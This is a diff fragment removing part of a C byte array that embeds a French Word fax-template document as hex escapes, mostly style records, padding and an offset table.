-"\x03\x53\x03\x35\xd6\x05\x01\x02\x03\xc2\x05\x35\xd6\x05\x02\x03"
-"\x03\xdc\x08\x35\xd6\x05\x03\x04\x03\x5d\x06\x35\xd6\x05\x04\x05"
-"\x03\x4f\x07\x35\xd6\x05\x05\x06\x03\x5d\x06\x34\xd6\x06\x00\x01"
-"\x05\x00\x00\x00\x34\xd6\x06\x00\x01\x0a\x03\x46\x00\xf1\x00\x16"
-"\x24\x01\x17\x24\x01\x49\x66\x01\x00\x00\x00\x01\x96\x00\x00\x21"
-"\x76\x00\x06\x68\x01\x35\xd6\x05\x00\x01\x03\x53\x03\x35\xd6\x05"
-"\x01\x02\x03\xc2\x05\x35\xd6\x05\x02\x03\x03\xdc\x08\x35\xd6\x05"
-"\x03\x04\x03\x5d\x06\x35\xd6\x05\x04\x05\x03\x4f\x07\x35\xd6\x05"
-"\x05\x06\x03\x5d\x06\x23\x76\x00\x01\x53\x03\x23\x76\x01\x02\xc2"
-"\x05\x23\x76\x02\x03\xdc\x08\x23\x76\x03\x04\x5d\x06\x23\x76\x04"
-"\x05\x4f\x07\x23\x76\x05\x06\x5d\x06\x3a\x56\x0b\x00\x02\x96\x46"
-"\x00\x13\xd6\x30\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff"
-"\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff"
-"\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff"
-"\x04\x01\x00\x00\x14\xf6\x01\x00\x00\x18\xf6\x03\x00\x00\x35\xd6"
-"\x05\x00\x01\x03\x53\x03\x35\xd6\x05\x01\x02\x03\xc2\x05\x35\xd6"
-"\x05\x02\x03\xce\xdc\x08\x35\xd6\x05\x03\x04\x03\x5d\x06\x35\xd6"
-"\x05\x04\x05\x03\x4f\x07\x35\xd6\x05\x05\x06\x03\x5d\x06\x34\xd6"
-"\x06\x00\x01\x05\x00\x00\x00\x34\xd6\x06\x00\x01\x0a\x03\x46\x00"
-"\xf1\x00\x16\x24\x01\x17\x24\x01\x49\x66\x01\x00\x00\x00\x01\x96"
-"\x00\x00\x21\x76\x00\x06\x68\x01\x35\xd6\x05\x00\x01\x03\x53\x03"
-"\x35\xd6\x05\x01\x02\x03\xc2\x05\x35\xd6\x05\x02\x03\x03\xdc\x08"
-"\x35\xd6\x05\x03\x04\x03\x5d\x06\x35\xd6\x05\x04\x05\x03\x4f\x07"
-"\x35\xd6\x05\x05\x06\x03\x5d\x06\x23\x76\x00\x01\x53\x03\x23\x76"
-"\x01\x02\xc2\x05\x23\x76\x02\x03\xdc\x08\x23\x76\x03\x04\x5d\x06"
-"\x23\x76\x04\x05\x4f\x07\x6b\x76\x05\x06\x5d\x06\x3a\x56\x0b\x00"
-"\x02\x96\x46\x00\x13\xd6\x30\x00\x00\x00\xff\x04\x01\x00\x00\x00"
-"\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00"
-"\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00"
-"\x00\x00\xff\x04\x01\x00\x00\x14\xf6\x01\x00\x00\x18\xf6\x03\x00"
-"\x00\x35\xd6\x05\x00\x01\x03\x53\x03\x35\xd6\x05\x01\x02\x03\xc2"
-"\x05\x35\xd6\x05\x02\x03\x03\xdc\x08\x35\xd6\x05\x03\x04\x03\x5d"
-"\x06\x35\xd6\x05\x04\x05\x03\x4f\x07\x35\xd6\x05\x05\x06\x03\x5d"
-"\x06\x34\xd6\x06\x00\x01\x05\x00\x00\x00\x34\xd6\x06\x00\x01\x0a"
-"\x03\x46\x00\xf1\x00\x16\x24\x01\x17\x24\x01\x49\x66\x01\x00\x00"
-"\x00\x01\x96\x00\x00\x21\x76\x00\x06\x68\x01\x35\xd6\x05\x00\x01"
-"\x03\x53\x03\x35\xd6\x05\x01\x02\x03\xc2\x05\x35\xd6\x05\x02\x03"
-"\x03\xdc\x08\x35\xd6\x05\x03\x04\x03\x5d\x06\x35\xd6\x05\x04\x05"
-"\x03\x4f\x07\x35\xd6\x05\x05\x06\x03\x5d\x06\x23\x76\x00\x01\x53"
-"\x03\x23\x76\x01\x02\xc2\x05\x23\x76\x02\x03\xdc\x08\x23\x76\x03"
-"\x04\x5d\x06\x23\x76\x04\x05\x4f\x07\x23\x76\x05\x06\x5d\x06\x3a"
-"\x56\x0b\x00\x02\x96\x46\x00\x13\xd6\x30\x00\x00\x00\xff\x04\x01"
-"\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01"
-"\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01"
-"\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x14\xf6\x01\x00\x00\x18"
-"\xf6\x03\x00\x00\x35\xd6\x05\x00\x01\x03\x53\x03\x35\xd6\x05\x01"
-"\x02\x03\xc2\x05\x35\xd6\x05\x02\x03\x03\xdc\x08\x35\xd6\x05\x03"
-"\x04\x03\x5d\x06\x35\xd6\x05\x04\x05\x03\x4f\x07\x35\xd6\x05\x05"
-"\x06\x03\x5d\x06\x34\xd6\x06\x00\x01\x05\x00\x00\x00\x34\xd6\x06"
-"\x00\x01\x0a\x03\x46\x00\xf1\x00\x16\x24\x01\x17\x24\x01\x49\x66"
-"\x01\x00\x00\x00\x01\x96\x00\x00\x21\x76\x00\x06\x68\x01\x35\xd6"
-"\x05\x00\x01\x03\x53\x03\x35\xd6\x05\x01\x02\x03\xc2\x05\x35\xd6"
-"\x05\x02\x03\x03\xdc\x08\x35\xd6\x05\x03\x04\x03\x5d\x06\x35\xd6"
-"\xf6\x04\x05\x03\x4f\x07\x35\xd6\x05\x05\x06\x03\x5d\x06\x23\x76"
-"\x00\x01\x53\x03\x23\x76\x01\x02\xc2\x05\x23\x76\x02\x03\xdc\x08"
-"\x23\x76\x03\x04\x5d\x06\x23\x76\x04\x05\x4f\x07\x23\x76\x05\x06"
-"\x5d\x06\x3a\x56\x0b\x00\x02\x96\x46\x00\x13\xd6\x30\x00\x00\x00"
-"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00"
-"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00"
-"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x14\xf6\x01"
-"\x00\x00\x18\xf6\x03\x00\x00\x35\xd6\x05\x00\x01\x03\x53\x03\x35"
-"\xd6\x05\x01\x02\x03\xc2\x05\x35\xd6\x05\x02\x03\x03\xdc\x08\x35"
-"\xd6\x05\x03\x04\x03\x5d\x06\x35\xd6\x05\x04\x05\x03\x4f\x07\x35"
-"\xd6\x05\x05\x06\x03\x5d\x06\x34\xd6\x06\x00\x01\x05\x00\x00\x00"
-"\x34\xd6\x06\x00\x01\x0a\x03\x46\x00\xf1\x00\x16\x24\x01\x17\x24"
-"\x01\x49\x66\x01\x00\x00\x00\x01\x96\x00\x00\x21\x76\x00\x06\x68"
-"\x01\x35\xd6\x05\x00\x01\x03\x53\x03\x35\xd6\x05\x01\x02\x03\xc2"
-"\x05\x35\xd6\x05\x02\x03\x03\xdc\x08\x35\xd6\x05\x03\x04\x03\x5d"
-"\x06\x35\xd6\x05\x04\x05\x03\x4f\x07\x35\xd6\x05\x05\x06\x03\x5d"
-"\x06\x23\x76\x00\x01\x53\x03\x23\x76\x01\x02\xc2\x05\x23\x76\x02"
-"\x03\xdc\x08\x23\x76\x03\x04\x5d\x06\x23\x76\x04\x05\x4f\x07\x23"
-"\x76\x05\x06\x5d\x06\x3a\x56\x0b\x00\x02\x96\x46\x00\x13\xd6\x30"
-"\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00"
-"\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00"
-"\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00"
-"\x14\xf6\x01\x00\x00\x18\xf6\x03\x00\x00\x35\xd6\x05\x00\x01\x03"
-"\x53\x03\x35\xd6\x05\x01\x02\x03\xc2\x05\x35\xd6\x05\x02\x03\x03"
-"\xdc\x08\x35\xd6\x05\x03\x04\x03\x5d\x06\x35\xd6\x05\x04\x05\x03"
-"\x4f\x07\x35\xd6\x05\x05\x06\x03\x5d\x06\x34\xd6\x06\x00\x01\x05"
-"\x00\x00\x00\x34\xd6\x06\x00\x01\x0a\x03\x46\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd3\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x43\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x14\x00\x18\x00\x12\x00\x01\x00\x9c\x00\x0f\x00\x03\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x38\x00\x00\x40\xf1\xff\x02\x00\x38\x00"
-"\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x4e\x00\x6f\x00"
-"\x72\x00\x6d\x00\x61\x00\x6c\x00\x00\x00\x02\x00\x00\x00\x10\x00"
-"\x5f\x48\x01\x04\x6d\x48\x0c\x04\x73\x48\x0c\x04\x74\x48\x0c\x04"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x3a\x00\x41\x40\xf2\xff\xa1\x00\x3a\x00\x0c\x01\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x11\x00\x50\x00\x6f\x00\x6c\x00\x69\x00"
-"\x63\x00\x65\x00\x20\x00\x70\x00\x61\x00\x72\x00\x20\x00\x64\x00"
-"\xe9\x00\x66\x00\x61\x00\x75\x00\x74\x00\x00\x00\x00\x00\x5a\x00"
-"\x69\x40\xf3\xff\xb3\x00\x5a\x00\x0c\x01\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x0e\x00\x54\x00\x61\x00\x62\x00\x6c\x00\x65\x00\x61\x00"
-"\x75\x00\x20\x00\x4e\x00\x6f\x00\x72\x00\x6d\x00\x61\x00\x6c\x00"
-"\x00\x00\x20\x00\x3a\x56\x0b\x00\x17\xf6\x03\x00\x00\x34\xd6\x06"
-"\x00\x01\x05\x03\x00\x00\x34\xd6\x06\x00\x01\x0a\x03\x6c\x00\x61"
-"\xf6\x03\x00\x00\x02\x00\x0b\x00\x00\x00\x32\x00\x6b\x00\xf4\xff"
-"\xc1\x00\x32\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x0c\x00"
-"\x41\x00\x75\x00\x63\x00\x75\x00\x6e\x00\x65\x00\x20\x00\x6c\x00"
-"\x69\x00\x73\x00\x74\x00\x65\x00\x00\x00\x02\x00\x0c\x00\x00\x00"
-"\x00\x00\x2e\x00\xfe\x4f\x01\x00\xf2\x00\x2e\x00\x0c\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x09\x00\x44\x00\x66\x00\x78\x00\x4e\x00"
-"\x75\x00\x6d\x00\x46\x00\x61\x00\x78\x00\x00\x00\x02\x00\x0f\x00"
-"\x00\x00\x2c\x00\xfe\x4f\x01\x00\x02\x01\x2c\x00\x0c\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x08\x00\x44\x00\x66\x00\x78\x00\x48\x00"
-"\x65\x00\x75\x00\x72\x00\x65\x00\x00\x00\x02\x00\x10\x00\x00\x00"
-"\x2a\x00\xfe\x4f\x01\x00\x12\x01\x2a\x00\x0c\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x07\x00\x44\x00\x66\x00\x78\x00\x44\x00\x61\x00"
-"\x74\x00\x65\x00\x00\x00\x02\x00\x11\x00\x00\x00\x3a\x00\xfe\x4f"
-"\x01\x00\x22\x01\x3a\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x0f\x00\x44\x00\x66\x00\x78\x00\x44\x00\x65\x00\x73\x00\x74\x00"
-"\x69\x00\x6e\x00\x61\x00\x74\x00\x61\x00\x69\x00\x72\x00\x65\x00"
-"\x00\x00\x02\x00\x12\x00\x00\x00\x30\x00\xfe\x4f\x01\x00\x32\x01"
-;
-char file_part6[]=
-"\x30\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x44\x00"
-"\x66\x00\x78\x00\x53\x00\x6f\x00\x63\x00\x69\x00\xe9\x00\x74\x00"
-"\xe9\x00\x00\x00\x02\x00\x13\x00\x00\x00\x2c\x00\xfe\x4f\x01\x00"
-"\x42\x01\x2c\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00"
-"\x44\x00\x66\x00\x78\x00\x4f\x00\x62\x00\x6a\x00\x65\x00\x74\x00"
-"\x00\x00\x02\x00\x14\x00\x00\x00\x36\x00\x1f\x40\x01\x00\x52\x01"
-"\x36\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\x00\x45\x00"
-"\x6e\x00\x2d\x00\x74\x00\xea\x00\x74\x00\x65\x00\x00\x00\x0d\x00"
-"\x15\x00\x0d\xc6\x08\x00\x02\xb8\x11\x70\x23\x01\x02\x00\x00\x00"
-"\x40\x00\x20\x40\x01\x00\x62\x01\x40\x00\x0c\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x0c\x00\x50\x00\x69\x00\x65\x00\x64\x00\x20\x00"
-"\x64\x00\x65\x00\x20\x00\x70\x00\x61\x00\x67\x00\x65\x00\x00\x00"
-"\x0d\x00\x16\x00\x0d\xc6\x08\x00\x02\xb8\x11\x70\x23\x01\x02\x00"
-"\x00\x00\x34\x00\x29\x40\xa2\x00\x71\x01\x34\x00\x0c\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x0e\x00\x4e\x00\x75\x00\x6d\x00\xe9\x00"
-"\x72\x00\x6f\x00\x20\x00\x64\x00\x65\x00\x20\x00\x70\x00\x61\x00"
-"\x67\x00\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1a\x74\x00\x00"
-"\x07\x00\x00\x02\x01\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00"
-"\x2d\x00\x00\x00\x6e\x00\x00\x00\x81\x00\x00\x00\xab\x02\x00\x00"
-"\xf4\x02\x00\x00\xf5\x02\x00\x00\x11\x03\x00\x00\x32\x03\x00\x00"
-"\x33\x03\x00\x00\x66\x03\x00\x00\x20\x04\x00\x00\xd3\x04\x00\x00"
-"\x08\x05\x00\x00\x62\x05\x00\x00\x63\x05\x00\x00\x8a\x05\x00\x00"
-"\x18\x06\x00\x00\xbc\x06\x00\x00\xbd\x06\x00\x00\xf6\x06\x00\x00"
-"\x97\x08\x00\x00\x98\x08\x00\x00\xb5\x08\x00\x00\x39\x0a\x00\x00"
-"\x3a\x0a\x00\x00\x46\x0a\x00\x00\xbd\x0a\x00\x00\xff\x0a\x00\x00"
-"\xcd\x0c\x00\x00\xe9\x0e\x00\x00\x99\x0f\x00\x00\xb8\x11\x00\x00"
-"\x12\x12\x00\x00\x2f\x13\x00\x00\x7e\x13\x00\x00\x7f\x13\x00\x00"
-"\x91\x13\x00\x00\x10\x14\x00\x00\x11\x14\x00\x00\x15\x14\x00\x00"
-"\x5d\x15\x00\x00\x5e\x15\x00\x00\x68\x15\x00\x00\x20\x16\x00\x00"
-"\x01\x17\x00\x00\x62\x17\x00\x00\x5e\x18\x00\x00\x5f\x18\x00\x00"
-"\xa1\x18\x00\x00\x4e\x19\x00\x00\x71\x1b\x00\x00\xd9\x1b\x00\x00"
-"\x63\x1c\x00\x00\x0d\x1e\x00\x00\x3b\x1e\x00\x00\x0d\x20\x00\x00"
-"\xde\x20\x00\x00\x57\x21\x00\x00\xbc\x21\x00\x00\x7b\x22\x00\x00"
-"\x40\x23\x00\x00\xdf\x23\x00\x00\x69\x23\x00\x00\x87\x23\x00\x00"
-"\x88\x23\x00\x00\x9c\x23\x00\x00\x13\x24\x00\x00\x41\x24\x00\x00"
-"\x42\x24\x00\x00\x5a\x24\x00\x00\x20\x25\x00\x00\x65\x25\x00\x00"
-"\x82\x25\x00\x00\x30\x26\x00\x00\x54\x26\x00\x00\x15\x27\x00\x00"
-"\x60\x27\x00\x00\xf0\x27\x00\x00\x90\x28\x00\x00\x47\x29\x00\x00"
-"\x48\x29\x00\x00\x33\x2a\x00\x00\x34\x2a\x00\x00\x30\x2b\x00\x00"
-"\x23\x2c\x00\x00\x24\x2c\x00\x00\xae\x2c\x00\x00\xc8\x2c\x00\x00"
-"\xc9\x2c\x00\x00\x33\x2d\x00\x00\x34\x2d\x00\x00\xee\x2e\x00\x00"
-"\x4f\x30\x00\x00\x9c\x30\x00\x00\xe3\x30\x00\x00\x62\x31\x00\x00"
-"\x63\x31\x00\x00\x29\x32\x00\x00\xda\x33\x00\x00\xdb\x33\x00\x00"
-"\xe7\x33\x00\x00\x76\x34\x00\x00\x77\x34\x00\x00\x86\x34\x00\x00"
-"\x97\x35\x00\x00\x19\x36\x00\x00\xca\x36\x00\x00\xe4\x37\x00\x00"
-"\x06\x38\x00\x00\x07\x38\x00\x00\x08\x38\x00\x00\x09\x38\x00\x00"
-"\x0a\x38\x00\x00\x19\x38\x00\x00\x1a\x38\x00\x00\x2a\x39\x00\x00"
-"\x6b\x39\x00\x00\x6c\x39\x00\x00\x74\x39\x00\x00\x75\x39\x00\x00"
-"\x81\x39\x00\x00\xe5\x39\x00\x00\xe6\x39\x00\x00\xf0\x39\x00\x00"
-"\x1c\x3a\x00\x00\x4a\x3a\x00\x00\x4b\x3a\x00\x00\x67\x3a\x00\x00"
-"\xa0\x3a\x00\x00\xa1\x3a\x00\x00\xac\x3a\x00\x00\x51\x3b\x00\x00"
-"\x52\x3b\x00\x00\x76\x3b\x00\x00\xe2\x3b\x00\x00\xe3\x3b\x00\x00"
-"\xf6\x3b\x00\x00\xc7\x3c\x00\x00\xc8\x3c\x00\x00\xe0\x3c\x00\x00"
-"\x66\x3d\x00\x00\x67\x3d\x00\x00\x76\x3d\x00\x00\x46\x3e\x00\x00"
-"\x98\x3e\x00\x00\xbb\x3e\x00\x00\x9a\x3f\x00\x00\x9b\x3f\x00\x00"
-"\xa4\x3f\x00\x00\xc7\x3f\x00\x00\xe7\x3f\x00\x00\x4b\x41\x00\x00"
-"\x4c\x41\x00\x00\x62\x41\x00\x00\x6a\x42\x00\x00\x06\x43\x00\x00"
-"\xaf\x43\x00\x00\x21\x44\x00\x00\xef\x44\x00\x00\xf0\x44\x00\x00"
-"\x17\x45\x00\x00\x18\x45\x00\x00\x29\x45\x00\x00\x26\x46\x00\x00"
-"\xfd\x46\x00\x00\xfe\x46\x00\x00\x0c\x47\x00\x00\x6f\x47\x00\x00"
-"\xe3\x47\x00\x00\xe4\x47\x00\x00\xee\x47\x00\x00\xd6\x48\x00\x00"
-"\xd7\x48\x00\x00\xe4\x48\x00\x00\x3d\x4a\x00\x00\x3e\x4a\x00\x00"
-"\x4f\x4a\x00\x00\x86\x4b\x00\x00\x87\x4b\x00\x00\x98\x4b\x00\x00"
-"\x54\x4c\x00\x00\x55\x4c\x00\x00\x5d\x4c\x00\x00\xf6\x4d\x00\x00"
-"\xf7\x4d\x00\x00\x0f\x4e\x00\x00\x19\x4f\x00\x00\x1a\x4f\x00\x00"
-"\x31\x4f\x00\x00\x32\x4f\x00\x00\x41\x50\x00\x00\x42\x50\x00\x00"
-"\x4f\x50\x00\x00\x6e\x50\x00\x00\x6f\x50\x00\x00\x7d\x50\x00\x00"
-"\xca\x50\x00\x00\xde\x50\x00\x00\xef\x50\x00\x00\xf0\x50\x00\x00"
-"\xfb\x50\x00\x00\x1b\x51\x00\x00\x50\x51\x00\x00\x77\x51\x00\x00"
-"\x86\x51\x00\x00\x9d\x51\x00\x00\x9e\x51\x00\x00\xa9\x51\x00\x00"
-"\xdc\x51\x00\x00\xff\x51\x00\x00\x00\x52\x00\x00\x07\x52\x00\x00"
-"\x51\x52\x00\x00\x52\x52\x00\x00\x59\x52\x00\x00\x9a\x52\x00\x00"
-"\x9b\x52\x00\x00\xa3\x52\x00\x00\xd4\x52\x00\x00\xfc\x52\x00\x00"
-"\xfd\x52\x00\x00\x06\x53\x00\x00\x42\x53\x00\x00\xab\x53\x00\x00"
-"\xac\x53\x00\x00\xb4\x53\x00\x00\xe7\x53\x00\x00\x27\x54\x00\x00"
-"\x28\x54\x00\x00\x31\x54\x00\x00\x6f\x54\x00\x00\xa1\x54\x00\x00"
-"\xa2\x54\x00\x00\xaf\x54\x00\x00\xf7\x54\x00\x00\xf8\x54\x00\x00"
-"\x04\x55\x00\x00\x40\x55\x00\x00\x41\x55\x00\x00\x48\x55\x00\x00"
-"\x84\x55\x00\x00\x85\x55\x00\x00\x92\x55\x00\x00\xa7\x55\x00\x00"
-"\xa8\x55\x00\x00\xb9\x55\x00\x00\x22\x56\x00\x00\x23\x56\x00\x00"
-"\x3e\x56\x00\x00\x66\x56\x00\x00\x97\x56\x00\x00\xc0\x56\x00\x00"
-"\xd8\x56\x00\x00\xeb\x56\x00\x00\xfc\x56\x00\x00\x24\x57\x00\x00"
-"\x25\x57\x00\x00\x40\x57\x00\x00\x68\x57\x00\x00\x98\x57\x00\x00"
-"\xc1\x57\x00\x00\xde\x57\x00\x00\xf1\x57\x00\x00\x19\x58\x00\x00"
-"\x1a\x58\x00\x00\xb8\x58\x00\x00\xb9\x58\x00\x00\xd0\x58\x00\x00"
-"\xf4\x58\x00\x00\x5a\x59\x00\x00\x5b\x59\x00\x00\x85\x59\x00\x00"
-"\xad\x59\x00\x00\x21\x5a\x00\x00\x22\x5a\x00\x00\x2a\x5a\x00\x00"
-"\xed\x5a\x00\x00\x4e\x5b\x00\x00\x4f\x5b\x00\x00\x5a\x5b\x00\x00"
-"\x45\x5c\x00\x00\x46\x5c\x00\x00\x4d\x5c\x00\x00\x8f\x5c\x00\x00"
-"\x90\x5c\x00\x00\xa9\x5c\x00\x00\x6d\x5d\x00\x00\x6e\x5d\x00\x00"
-"\x9c\x5d\x00\x00\x18\x5e\x00\x00\x19\x5e\x00\x00\x39\x5e\x00\x00"
-"\x79\x5e\x00\x00\x7a\x5e\x00\x00\x86\x5e\x00\x00\xf0\x5e\x00\x00"
-"\xf1\x5e\x00\x00\xfc\x5e\x00\x00\xa1\x5f\x00\x00\xa2\x5f\x00\x00"
-"\xb0\x5f\x00\x00\x7f\x60\x00\x00\x80\x60\x00\x00\x8b\x60\x00\x00"
-"\xd2\x60\x00\x00\xd3\x60\x00\x00\xed\x60\x00\x00\x07\x61\x00\x00"
-"\xfd\x61\x00\x00\x35\x62\x00\x00\x36\x62\x00\x00\x41\x62\x00\x00"
-"\xc9\x62\x00\x00\xca\x62\x00\x00\xd4\x62\x00\x00\x07\x63\x00\x00"
-"\x08\x63\x00\x00\x14\x63\x00\x00\x44\x63\x00\x00\x45\x63\x00\x00"
-"\x5d\x63\x00\x00\x8f\x63\x00\x00\xe2\x63\x00\x00\xe3\x63\x00\x00"
-"\xed\x63\x00\x00\x2b\x65\x00\x00\x2c\x65\x00\x00\x3f\x65\x00\x00"
-"\x9e\x65\x00\x00\x9f\x65\x00\x00\xac\x65\x00\x00\xce\x65\x00\x00"
-"\xcf\x65\x00\x00\xe2\x65\x00\x00\x1e\x66\x00\x00\x1f\x66\x00\x00"
-"\x2d\x66\x00\x00\x15\x67\x00\x00\x16\x67\x00\x00\x17\x67\x00\x00"
-"\x18\x67\x00\x00\x19\x67\x00\x00\x1a\x67\x00\x00\x1b\x67\x00\x00"
-"\x1c\x67\x00\x00\x1d\x67\x00\x00\x1e\x67\x00\x00\x1f\x67\x00\x00"
-"\x20\x67\x00\x00\x21\x67\x00\x00\x22\x67\x00\x00\x23\x67\x00\x00"
-"\x24\x67\x00\x00\x25\x67\x00\x00\x26\x67\x00\x00\x27\x67\x00\x00"
-"\x28\x67\x00\x00\x29\x67\x00\x00\x2a\x67\x00\x00\x2b\x67\x00\x00"
-"\x2c\x67\x00\x00\x2d\x67\x00\x00\x2e\x67\x00\x00\x2f\x67\x00\x00"
-"\x30\x67\x00\x00\x31\x67\x00\x00\x32\x67\x00\x00\x33\x67\x00\x00"
-"\x34\x67\x00\x00\x35\x67\x00\x00\x36\x67\x00\x00\x37\x67\x00\x00"
-"\x38\x67\x00\x00\x39\x67\x00\x00\x3a\x67\x00\x00\x3b\x67\x00\x00"
-"\x51\x67\x00\x00\xa6\x67\x00\x00\xa7\x67\x00\x00\xaa\x67\x00\x00"
-"\xb1\x67\x00\x00\xbe\x67\x00\x00\xcd\x67\x00\x00\xd8\x67\x00\x00"
-"\xdc\x67\x00\x00\xdd\x67\x00\x00\xe0\x67\x00\x00\xe5\x67\x00\x00"
-"\xf1\x67\x00\x00\x00\x68\x00\x00\x0d\x68\x00\x00\x11\x68\x00\x00"
-"\x12\x68\x00\x00\x15\x68\x00\x00\x1a\x68\x00\x00\x25\x68\x00\x00"
-"\x34\x68\x00\x00\x3e\x68\x00\x00\x48\x68\x00\x00\x49\x68\x00\x00"
-"\x4c\x68\x00\x00\x54\x68\x00\x00\x5f\x68\x00\x00\x6e\x68\x00\x00"
-"\x81\x68\x00\x00\x85\x68\x00\x00\x86\x68\x00\x00\x89\x68\x00\x00"
-"\x8e\x68\x00\x00\xa2\x68\x00\x00\xb1\x68\x00\x00\xc3\x68\x00\x00"
-"\xd1\x68\x00\x00\xd2\x68\x00\x00\xd5\x68\x00\x00\xd9\x68\x00\x00"
-"\xe6\x68\x00\x00\xf5\x68\x00\x00\xfd\x68\x00\x00\x01\x69\x00\x00"
-"\x02\x69\x00\x00\x05\x69\x00\x00\x0a\x69\x00\x00\x13\x69\x00\x00"
-"\x22\x69\x00\x00\x2c\x69\x00\x00\x30\x69\x00\x00\x31\x69\x00\x00"
-"\x34\x69\x00\x00\x39\x69\x00\x00\x46\x69\x00\x00\x55\x69\x00\x00"
-"\x5b\x69\x00\x00\x5f\x69\x00\x00\x60\x69\x00\x00\x63\x69\x00\x00"
-"\x68\x69\x00\x00\x75\x69\x00\x00\x84\x69\x00\x00\x8c\x69\x00\x00"
-"\x9a\x69\x00\x00\x9b\x69\x00\x00\x9e\x69\x00\x00\xa3\x69\x00\x00"
-"\xb0\x69\x00\x00\xbf\x69\x00\x00\xc6\x69\x00\x00\xce\x69\x00\x00"
-"\xcf\x69\x00\x00\xd2\x69\x00\x00\xd7\x69\x00\x00\xe4\x69\x00\x00"
-"\xf3\x69\x00\x00\xfb\x69\x00\x00\xff\x69\x00\x00\x00\x6a\x00\x00"
-"\x03\x6a\x00\x00\x07\x6a\x00\x00\x13\x6a\x00\x00\x22\x6a\x00\x00"
-"\x33\x6a\x00\x00\x3b\x6a\x00\x00\x3c\x6a\x00\x00\x3f\x6a\x00\x00"
